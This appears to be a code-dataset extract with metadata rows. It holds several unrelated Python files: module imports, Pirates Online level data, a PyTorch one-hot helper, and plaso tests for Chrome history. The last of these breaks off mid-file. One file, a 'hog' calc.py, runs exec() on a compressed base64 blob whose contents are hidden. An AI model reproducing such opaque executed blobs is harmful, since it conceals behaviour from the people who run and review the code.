| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
6fcd8e6686974e8dc3d5d6017b3bac0a0c41c512
| 265
|
py
|
Python
|
NameMarkupLanguage/NameMarkInterface/__init__.py
|
sonnts996/NameMarkLanguage
|
448db602371e91d661bbf3de40070904a89e85fa
|
[
"MIT"
] | null | null | null |
NameMarkupLanguage/NameMarkInterface/__init__.py
|
sonnts996/NameMarkLanguage
|
448db602371e91d661bbf3de40070904a89e85fa
|
[
"MIT"
] | null | null | null |
NameMarkupLanguage/NameMarkInterface/__init__.py
|
sonnts996/NameMarkLanguage
|
448db602371e91d661bbf3de40070904a89e85fa
|
[
"MIT"
] | null | null | null |
from NameMarkupLanguage.NameMarkInterface.NameMark import NameMark
from NameMarkupLanguage.NameMarkInterface.DefTag import DefTag
from NameMarkupLanguage.NameMarkInterface.NMList import NMList
from NameMarkupLanguage.NameMarkInterface.DefManager import DefManager
| 44.166667
| 70
| 0.90566
| 24
| 265
| 10
| 0.333333
| 0.366667
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064151
| 265
| 5
| 71
| 53
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6fd1a56f5dcfa371809d9e29e240e4b6ef669b20
| 2,649
|
py
|
Python
|
projects/hog/calc.py
|
wangjiapengone/CS-61A-Fall18
|
552a39c165b9c15c291967ce261e23dc2985a4b2
|
[
"MIT"
] | 1
|
2021-01-04T05:08:24.000Z
|
2021-01-04T05:08:24.000Z
|
projects/hog/calc.py
|
wangjiapengone/CS-61A-Fall18
|
552a39c165b9c15c291967ce261e23dc2985a4b2
|
[
"MIT"
] | null | null | null |
projects/hog/calc.py
|
wangjiapengone/CS-61A-Fall18
|
552a39c165b9c15c291967ce261e23dc2985a4b2
|
[
"MIT"
] | null | null | null |
import zlib, base64
exec(zlib.decompress(base64.b64decode('eJzNWVlv20YQftevYAUEIm1aIXMUhdAt2qZKmsTxIR+R4QoEJVESy9MkZck29N+7S0mcmeXKdoIW6IMMcufYOb+dpZvN5rskSueFl2vFzNO8ZeqNCm+sLfxYy9zC05KJlsSelhfibXqnuVPXj/NCc+OEC2TtZrPZ+N27e//b5O8/giVzhzm8vmP5PILXK/beDXMPFkbMz4UyNx6h1R6L3CW8nrFinoaIfs/SzI8LWJiyyI/h9ZZ1lyMvLfwELUYsc+MpaDkcstDPQclhwIq71GtMsiTSRkkY8jBwBbnmR2mSFVrsRt54bcjYm2iV3mN9EhudRrUwDNjDqqERnkt9ryIfCmbNB+rwUOOR1Hi4QYVgQa/XwDtgk5ho45yZV8yzeAd/QyYHl9SBD3rF3RW2bdjtA1imAn+CQN+sHs+FLOHr6svSV3n/pb58YVsH+vLlS9sy+KNRt7GL9jAYU62fG9QsF0g+ScgJiL/TITQ+PM4HkyQDgTlJhj/g9j1GFz6qtb5kYAQ1tgBjP5lJmvIOiwsnHyWZh3LwpqrO4RE4cQWrxwzKUm994M9nBe/SlnndKnXlLbO1aVy/fFnMEv43zbxbZ/1Y+JHX4h5WKi+JynNuRqWycMPwjsvM3NzhBvOneB45Ge+VXKggDs7AwanwyM1zj3cRdD6iQxFdQinYpEem7c2mmscBBK+XRoH5HyDkl3pJY5a5kUUhNCvLmSVZPlZadvpdTtRskQ3fhw1qViKncfWdMmYj8xF3tbhvSz59wYYKFmfsjzwnmRejJPLA9N7zvTw2VJyP6BZhUQIHdmFdtYixi6m8ZBHJxaRtSSN6QaLN6xzRZlALs7rR3FJcfD3GLBm0u5s1pcqe/moPAVWJcwdoQWCeaQvoFtX8TDV9WU2/UqMyDNj2IQ6zRrUjWEPp/vOQ/qlUnsNqnxp4JIeyePETIPywxweLMUryD0Dq0kiNEUVTxhI46CmHzf/CgFLwxnnxkyJGz1MEeuoAcKyvS5vtCKkJME36oVo1eXEDZWxuCx4FwRRFDu9fJBAIJUjeAq1F2TI1W7WYUfZcLztnzGcpfOry4xjW6+f7GVDbfuFFuW6gMyhjSP2D3bHNV/z3mv/e8N9b/vuR/1ZIIn9UAnOmCs7XG87XmDF5jHFjhBD4tWI7ppFJIZA9kwRJApcDmwD8Fm7WMXuAo61jrxCEfWbKnQ5sEwe+IizKsZTMMZ+gAL+SkebzNifCDCJyCiIXQqTaijbeDdg21lX7nYrWIXG4qU3Bi1IneofR6mbArMZOGgK0rzAqX5DiBEnFab2giUz0sg2tdY/a5jRxQ2ZbFqn3U3D5Kwp7zKgw363I7gi4fARzASUs01JjQlwCgQX9zxNe9r1F0Gj5HUrtHUrX4dHBVYjexzIYxr6KtlzTjJevOKKWFzKI1gWfHTSKsV3mcbjjpq2PeSC8qwhgOqS7O0C8wb3uoRuR3bYg/9It5nNZ3ZvL3ZirlSaEK7ZdbFcPcbLQUU/x3arHhQAwTNkhDbeqKwmeF9igWTKtg2ai8+X2xI/d0Nlex6uWCgpJ3ycJx584sBWz1whKmpwdVQnTCV3UjTwU9UDFFFSMTLwtJNUa7Dgd1aPStym3kXI8nQjlcnneVuWZuT66bwQf8SxcmxNlCAsi3nK2bSgUxcqhuqcAox5N6ykWVCHRk/nFE950R8B/YUJ1R4NestpvxWCE/e3XuWyZ51yhqaFM4SdaYnLx38h+k6jtPIRvlHG+la481dsZw9bdq49Y6DkyK8mfCW5gk4gcbPf4eIWt4dhCSaZXN5XunoH8MgDvonopncHnsKEYB0ikvqojRQ65Q1RPaLnPAI+nHI8XMz9Etd4nfk7Bzf71gT2QcaTWREPa9U+Vt7ZFJzVSSGWmPXI0SbPPlFjVX3MgM3EMmFdS103vEfu/uajQHufs+tsqIzWkkkzVlSiyQLwNToi35zSgA
fqmdsJhuyRiXDmpZ5Hc6/jdFng3qTN+hqqTg9tvu2nqxWMkRSNDow92C6ZREhd+PPfKQwRbCV82qHwVwsOhQYovmK/nThopGlSqSirEkNXcrsUOYXLIgXh3UOb7jKPyXlouU9gNeVKeEFWL2Sqx1M3zDffmDKaqFK4HJ4O1YU9laN4gaU6TVKfHqjpLwSFkKbhQnbCEt36eUPIo5C4iDIAtb7fftR3Hj/3CcYDko0mDYHngrwdWjJbSDmicvnjeDtKR9Q2f6R61i1AVnxV7W9v4KEVMw9/2m91bN5y74h8m4v9FJ6F752Xag7Vq5dqDvXp4tdpwemPt4fXK5FjAW4bL+GON7znkzFys3LnZ5s0VuYUuGy3mS7O2qLgSYIFB23HE92zHUYiW7Xfd6egHtrG3pxQ3VcEx5GR+/P5kBkf/WTK9LEvQl5SjfyuRos3G5T8LJzwaycKPp1q5V+evWCADT3BHe3iz+p9m8jDQ5SAZSt1rUsMXMVtTGWs6TuT6seM0O+S217pK5pm4tWnl9az67ykPxKpVi4O4LBqNfwA6Wo0h')))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
| 529.8
| 2,563
| 0.96074
| 89
| 2,649
| 28.595506
| 0.966292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148162
| 0.003775
| 2,649
| 4
| 2,564
| 662.25
| 0.816218
| 0.023028
| 0
| 0
| 0
| 0.5
| 0.974855
| 0.974855
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
6fd2c0788af8420d199607616b772cca84a1a494
| 10,860
|
py
|
Python
|
pirates/leveleditor/worldData/SwampTestIslandB.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/SwampTestIslandB.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/SwampTestIslandB.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3
objectStruct = {'Locator Links': [['1153868315.8sdnaik0', '1152910060.11sdnaik', 'Bi-directional'], ['1153868315.8sdnaik1', '1152910301.05sdnaik0', 'Bi-directional'], ['1153868634.75sdnaik0', '1152910060.11sdnaik0', 'Bi-directional'], ['1152910307.13sdnaik', '1156281363.2sdnaik1', 'Bi-directional'], ['1156281161.64sdnaik0', '1156281363.2sdnaik0', 'Bi-directional'], ['1153868634.75sdnaik1', '1156302222.63sdnaik', 'Bi-directional']],'Objects': {'1152909972.77sdnaik': {'Type': 'Island','Name': 'SwampTestIslandB','File': '','Objects': {'1152910060.11sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1152910060.11sdnaik0': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1152910301.05sdnaik': {'Type': 'Island Game Area','File': 'SwampTemplateB','Hpr': VBase3(120.19, 0.0, 0.0),'Objects': {'1152910301.05sdnaik0': {'Type': 'Locator Node','Name': 'portal_interior_1','GridPos': Point3(-606.498, -425.911, 232.255),'Hpr': VBase3(-161.778, 0.0, -180.0),'Pos': Point3(-236.144, -43.732, 21.034),'Scale': VBase3(1.0, 1.0, 1.0)},'1152910307.13sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_2','GridPos': Point3(-27.183, -186.116, 232.255),'Hpr': VBase3(26.445, 0.0, -180.0),'Pos': Point3(453.452, 255.559, 12.06),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-1143.784, -1199.552, 81.761),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/swamps/swampB'}},'1153868315.8sdnaik': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(29.967, 0.0, 0.0),'Objects': {'1153868315.8sdnaik0': {'Type': 'Locator Node','Name': 'portal_connector_1','Hpr': VBase3(126.22, 0.0, 0.0),'Pos': Point3(465.537, 517.058, 2.343),'Scale': VBase3(1.0, 1.0, 1.0)},'1153868315.8sdnaik1': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-155.156, -163.935, 
227.03),'Hpr': VBase3(-148.231, 0.0, 0.0),'Pos': Point3(453.452, 255.559, 12.06),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-432.389, -1775.729, 86.948),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_swamp_cave'}},'1153868634.75sdnaik': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(-153.313, 0.0, 0.0),'Objects': {'1153868634.75sdnaik0': {'Type': 'Locator Node','Name': 'portal_connector_1','Hpr': VBase3(126.22, 0.0, 0.0),'Pos': Point3(465.537, 517.058, 2.343),'Scale': VBase3(1.0, 1.0, 1.0)},'1153868634.75sdnaik1': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-291.911, 214.833, 0.664),'Hpr': VBase3(-148.231, 0.0, 0.0),'Pos': Point3(453.452, 255.559, 12.06),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-1091.077, 1336.074, 129.211),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_swamp_cave'}},'1155864372.34sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864374.63sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864384.91sdnaik': {'Type': 'Cell Portal Area','Name': 'cell_spanish_town','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1155866758.05sdnaik': {'Type': 'Building Exterior','File': 'bilgewater_guildhall_interior_a','ExtUid': '1155866758.05sdnaik0','Hpr': VBase3(68.18, 0.0, 0.0),'Pos': Point3(506.389, 141.755, 45.292),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Name': 'English A','Door': 'models/buildings/shanty_guildhall_door','Interior': 'models/buildings/interior_shanty_guildhall','Model': 'models/buildings/english_corner_a'}},'1158184464.98sdnaik': {'Type': 'Building Exterior','File': 'rambleshack_building_int_tavern','ExtUid': '1158184464.98sdnaik0','Hpr': VBase3(-43.794, 0.0, 0.0),'Pos': Point3(560.901, 106.555, 41.918),'Scale': 
VBase3(1.0, 1.0, 1.0),'Visual': {'Name': '','Door': 'models/buildings/shanty_guildhall_door','Interior': 'models/buildings/interior_tavern','Model': 'models/buildings/shanty_tavern_exterior'}},'1158184594.03sdnaik': {'Type': 'Building Exterior','File': 'swamptest_interior_1','ExtUid': '1158184594.03sdnaik0','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(409.067, 155.856, 44.575),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Name': '','Door': 'models/buildings/shanty_guildhall_door','Interior': 'models/buildings/interior_shanty_guildhall','Model': 'models/buildings/english_a'}}},'Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864824.89sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1155864827.11sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1156280826.23sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1156280828.67sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)},'1156281161.64sdnaik': {'Type': 'Island Game Area','File': 'SwampTemplateC','Hpr': VBase3(-36.598, 0.0, 0.0),'Objects': {'1156281161.64sdnaik0': {'Type': 'Locator Node','Name': 'portal_interior_1','GridPos': Point3(-113.557, -119.557, 123.863),'Hpr': VBase3(81.569, 0.0, 0.0),'Pos': Point3(-383.486, 124.706, 14.047),'Scale': VBase3(1.0, 1.0, 1.0)},'1156302222.63sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_2','GridPos': Point3(-2121.404, -709.755, 122.18),'Hpr': VBase3(135.469, 0.0, 0.0),'Pos': Point3(557.708, 254.891, 12.365),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-2816.118, 1584.312, 635.326),'Scale': 
VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/swamps/swampC'}},'1156281363.2sdnaik': {'Type': 'Connector Tunnel','File': '','Hpr': VBase3(-94.487, 0.0, 0.0),'Objects': {'1156281363.2sdnaik0': {'Type': 'Locator Node','Name': 'portal_connector_1','GridPos': Point3(-808.963, -680.48, 73.384),'Hpr': VBase3(-88.748, 0.0, 0.0),'Pos': Point3(-3.613, 0.304, 4.651),'Scale': VBase3(1.0, 1.0, 1.0)},'1156281363.2sdnaik1': {'Type': 'Locator Node','Name': 'portal_connector_2','GridPos': Point3(-684.414, -557.419, 68.431),'Hpr': VBase3(72.65, -1.426, -0.516),'Pos': Point3(-103.188, 135.024, 3.777),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-2717.734, -50.514, 446.686),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/tunnels/tunnel_swamp'}},'1158184411.67sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_1','Hpr': VBase3(-18.331, 0.0, 0.0),'Pos': Point3(-219.917, -319.235, 0.595),'Scale': VBase3(1.0, 1.0, 1.0)},'1158184420.17sdnaik': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(68.97, 0.0, 0.0),'Pos': Point3(-285.103, -58.817, 44.049),'Scale': VBase3(1.0, 1.0, 1.0)}},'Visual': {'Model': 'models/islands/bilgewater_zero'}}},'Node Links': [],'Layers': {},'ObjectIds': {'1152909972.77sdnaik': '["Objects"]["1152909972.77sdnaik"]','1152910060.11sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910060.11sdnaik"]','1152910060.11sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910060.11sdnaik0"]','1152910301.05sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910301.05sdnaik"]','1152910301.05sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910301.05sdnaik"]["Objects"]["1152910301.05sdnaik0"]','1152910307.13sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1152910301.05sdnaik"]["Objects"]["1152910307.13sdnaik"]','1153868315.8sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868315.8sdnaik"]','1153868315.8sdnaik0': 
'["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868315.8sdnaik"]["Objects"]["1153868315.8sdnaik0"]','1153868315.8sdnaik1': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868315.8sdnaik"]["Objects"]["1153868315.8sdnaik1"]','1153868634.75sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868634.75sdnaik"]','1153868634.75sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868634.75sdnaik"]["Objects"]["1153868634.75sdnaik0"]','1153868634.75sdnaik1': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1153868634.75sdnaik"]["Objects"]["1153868634.75sdnaik1"]','1155864372.34sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864372.34sdnaik"]','1155864374.63sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864374.63sdnaik"]','1155864384.91sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]','1155864824.89sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864824.89sdnaik"]','1155864827.11sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864827.11sdnaik"]','1155866758.05sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1155866758.05sdnaik"]','1155866758.05sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1155866758.05sdnaik"]','1156280826.23sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156280826.23sdnaik"]','1156280828.67sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156280828.67sdnaik"]','1156281161.64sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281161.64sdnaik"]','1156281161.64sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281161.64sdnaik"]["Objects"]["1156281161.64sdnaik0"]','1156281363.2sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281363.2sdnaik"]','1156281363.2sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281363.2sdnaik"]["Objects"]["1156281363.2sdnaik0"]','1156281363.2sdnaik1': 
'["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281363.2sdnaik"]["Objects"]["1156281363.2sdnaik1"]','1156302222.63sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1156281161.64sdnaik"]["Objects"]["1156302222.63sdnaik"]','1158184411.67sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1158184411.67sdnaik"]','1158184420.17sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1158184420.17sdnaik"]','1158184464.98sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184464.98sdnaik"]','1158184464.98sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184464.98sdnaik"]','1158184594.03sdnaik': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184594.03sdnaik"]','1158184594.03sdnaik0': '["Objects"]["1152909972.77sdnaik"]["Objects"]["1155864384.91sdnaik"]["Objects"]["1158184594.03sdnaik"]'}}
| 5,430
| 10,813
| 0.679558
| 1,491
| 10,860
| 4.901408
| 0.18444
| 0.024357
| 0.024631
| 0.031746
| 0.614532
| 0.559797
| 0.490832
| 0.448823
| 0.380952
| 0.273946
| 0
| 0.297971
| 0.046961
| 10,860
| 2
| 10,813
| 5,430
| 0.408116
| 0
| 0
| 0
| 0
| 0
| 0.607126
| 0.300525
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d22105b96492401a62db6f44835ecf063df381d5
| 1,536
|
py
|
Python
|
CloudCast/src/utils/one_hot_encoder.py
|
holmdk/CloudCast
|
614ef77f08c5d12832ee5f9ba347f1d3fd67931a
|
[
"CC0-1.0"
] | 2
|
2021-12-21T03:03:03.000Z
|
2022-01-16T08:15:13.000Z
|
CloudCast/src/utils/one_hot_encoder.py
|
holmdk/CloudCast
|
614ef77f08c5d12832ee5f9ba347f1d3fd67931a
|
[
"CC0-1.0"
] | null | null | null |
CloudCast/src/utils/one_hot_encoder.py
|
holmdk/CloudCast
|
614ef77f08c5d12832ee5f9ba347f1d3fd67931a
|
[
"CC0-1.0"
] | 3
|
2021-04-24T15:14:28.000Z
|
2021-12-03T17:46:03.000Z
|
import torch
#adapted from http://jacobkimmel.github.io/pytorch_onehot/
def make_one_hot(labels, C=4):
'''
Converts an integer label torch.autograd.Variable to a one-hot Variable.
Parameters
----------
labels : torch.autograd.Variable of torch.cuda.LongTensor
N x 1 x H x W, where N is batch size.
Each value is an integer representing correct classification.
C : integer.
number of classes in labels.
Returns
-------
target : torch.autograd.Variable of torch.cuda.FloatTensor
N x C x H x W, where C is class number. One-hot encoded.
'''
one_hot = torch.cuda.FloatTensor(labels.size(0), C, labels.size(1), labels.size(2), labels.size(3)).zero_()
return one_hot.scatter_(1, labels.data.unsqueeze(1), 1)
def make_one_hot_reduced(labels, C=4):
    '''
    Converts a 2-D integer label tensor to a one-hot encoded float tensor
    with the class dimension first.

    Parameters
    ----------
    labels : torch.Tensor
        H x W (2-D) tensor of integer class labels; cast to long internally.
    C : integer.
        number of classes in labels.

    Returns
    -------
    target : torch.FloatTensor on the same device as *labels*
        C x H x W one-hot encoding: exactly one 1 along dim 0 per input
        element, zeros elsewhere.
    '''
    # The previous docstring was copied from make_one_hot and wrongly
    # described 4-D CUDA input; this variant builds a C x H x W target from
    # a 2-D label map.  torch.zeros(..., device=labels.device) replaces the
    # deprecated FloatTensor(...).zero_() constructor and also makes the
    # helper work for CUDA labels (the old CPU-only allocation would fail).
    one_hot = torch.zeros(C, labels.size(0), labels.size(1), device=labels.device)
    # scatter_ writes a 1 at each label's class index along dim 0; the index
    # tensor must be long, hence the explicit cast.
    return one_hot.scatter_(0, labels.long().unsqueeze(0), 1)
| 30.117647
| 113
| 0.633464
| 221
| 1,536
| 4.339367
| 0.276018
| 0.062565
| 0.131387
| 0.095933
| 0.757039
| 0.709072
| 0.709072
| 0.709072
| 0.709072
| 0.709072
| 0
| 0.013974
| 0.254557
| 1,536
| 50
| 114
| 30.72
| 0.823581
| 0.616536
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d225b917b80e8b3a508a5c0294a48a7ddcfa40fa
| 10,269
|
py
|
Python
|
tests/parsers/sqlite_plugins/chrome.py
|
nnyx7/plaso
|
9b05ad200acc7f5ad1fae9788ff8409fea8af2f8
|
[
"Apache-2.0"
] | null | null | null |
tests/parsers/sqlite_plugins/chrome.py
|
nnyx7/plaso
|
9b05ad200acc7f5ad1fae9788ff8409fea8af2f8
|
[
"Apache-2.0"
] | null | null | null |
tests/parsers/sqlite_plugins/chrome.py
|
nnyx7/plaso
|
9b05ad200acc7f5ad1fae9788ff8409fea8af2f8
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Google Chrome History database plugin."""
from __future__ import unicode_literals
import unittest
from plaso.formatters import chrome as _ # pylint: disable=unused-import
from plaso.lib import definitions
from plaso.parsers.sqlite_plugins import chrome
from tests.parsers.sqlite_plugins import test_lib
class GoogleChrome8HistoryPluginTest(test_lib.SQLitePluginTestCase):
    """Tests for the Google Chrome 8 history SQLite database plugin."""

    def testProcess(self):
        """Tests the Process function on a Chrome History database file."""
        plugin = chrome.GoogleChrome8HistoryPlugin()
        storage_writer = self._ParseDatabaseFileWithPlugin(
            ['History'], plugin)

        # Parsing the fixture must not produce extraction warnings.
        self.assertEqual(storage_writer.number_of_warnings, 0)

        # The History file contains 71 events (69 page visits, 1 file downloads).
        self.assertEqual(storage_writer.number_of_events, 71)

        events = list(storage_writer.GetEvents())

        # Check the first page visited entry.
        event = events[0]

        self.CheckTimestamp(event.timestamp, '2011-04-07 12:03:11.000000')
        self.assertEqual(
            event.timestamp_desc, definitions.TIME_DESCRIPTION_LAST_VISITED)

        event_data = self._GetEventDataOfEvent(storage_writer, event)

        expected_url = 'http://start.ubuntu.com/10.04/Google/'
        self.assertEqual(event_data.url, expected_url)

        expected_title = 'Ubuntu Start Page'
        self.assertEqual(event_data.title, expected_title)

        expected_message = (
            '{0:s} ({1:s}) [count: 0] '
            'Visit Source: [SOURCE_FIREFOX_IMPORTED] Type: [LINK - User clicked '
            'a link] (URL not typed directly - no typed count)').format(
                expected_url, expected_title)
        expected_short_message = '{0:s} ({1:s})'.format(
            expected_url, expected_title)

        self._TestGetMessageStrings(
            event_data, expected_message, expected_short_message)

        # Check the first file downloaded entry.
        # NOTE(review): index 69 presumably follows the 69 page-visit events
        # counted above -- confirm against the fixture's event ordering.
        event = events[69]

        self.CheckTimestamp(event.timestamp, '2011-05-23 08:35:30.000000')
        self.assertEqual(
            event.timestamp_desc, definitions.TIME_DESCRIPTION_FILE_DOWNLOADED)

        event_data = self._GetEventDataOfEvent(storage_writer, event)

        expected_url = (
            'http://fatloss4idiotsx.com/download/funcats/'
            'funcats_scr.exe')
        self.assertEqual(event_data.url, expected_url)

        expected_full_path = '/home/john/Downloads/funcats_scr.exe'
        self.assertEqual(event_data.full_path, expected_full_path)

        expected_message = (
            '{0:s} ({1:s}). '
            'Received: 1132155 bytes out of: '
            '1132155 bytes.').format(expected_url, expected_full_path)
        expected_short_message = '{0:s} downloaded (1132155 bytes)'.format(
            expected_full_path)

        self._TestGetMessageStrings(
            event_data, expected_message, expected_short_message)
class GoogleChrome27HistoryPluginTest(test_lib.SQLitePluginTestCase):
    """Tests for the Google Chrome 27 history SQLite database plugin."""

    def _TestChromeHistoryDatabase(
        self, filename, visit_timestamp, download_timestamp):
        """Parses a Chrome 27+ History fixture and checks its two events.

        The 57/58/59 fixtures contain the same page visit and file download;
        only the timestamps differ, so the three test methods share this
        helper instead of three copy-pasted bodies.

        Args:
            filename (str): name of the History test file to parse.
            visit_timestamp (str): expected timestamp of the page visit event.
            download_timestamp (str): expected timestamp of the file download
                event.
        """
        plugin = chrome.GoogleChrome27HistoryPlugin()
        storage_writer = self._ParseDatabaseFileWithPlugin(
            [filename], plugin)

        self.assertEqual(storage_writer.number_of_warnings, 0)

